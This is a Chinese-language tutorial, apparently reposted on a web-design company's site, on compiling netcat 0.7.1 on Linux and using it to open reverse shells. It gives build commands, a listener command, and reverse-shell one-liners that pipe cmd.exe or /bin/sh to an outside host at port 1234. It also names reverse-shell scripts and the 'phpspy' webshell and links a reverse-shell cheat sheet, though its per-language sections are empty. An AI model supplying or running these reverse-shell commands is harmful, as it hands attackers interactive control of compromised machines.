网站建设行业文章5
当前位置: 首页 -> 企业资讯 -> 行业文章 -> linux下编译netcat并且反弹cmdshell
鸿大千秋新闻顶部侧栏



linux下编译netcat并且反弹cmdshell



本地Windows监听
nc -vv -l -p 1234        
 
 首先从sf上get一个tar的压缩包
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
然后当然是解压了
tar zxvf netcat-0.7.1.tar.gz
 解压完毕之后会生成目录,要cd进去
cd netcat-0.7.1
然后进行编译前的配置。
./configure
 配置完了之后就可以make编译了。
 编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat -h.如图
本地Windows监听
nc -vv -l -p 1234                                        
 
 
远程Windows转发
nc -t -e C:WINDOWSsystem32cmd.exe 8.8.8.8 1234
 
远程Linux转发
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php

 ———————NetCat for linux 参数e————————-

wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句话反弹命令
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
[Bash]


 

[PERL]


 

[Python]


 

[PHP]


 

[Ruby]


 

[Netcat]

 

原文:http://blog.xxgo.org/technology/linuxbackshellwithnc.html
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。



鸿大千秋网站建设团队敬上







Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有


联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号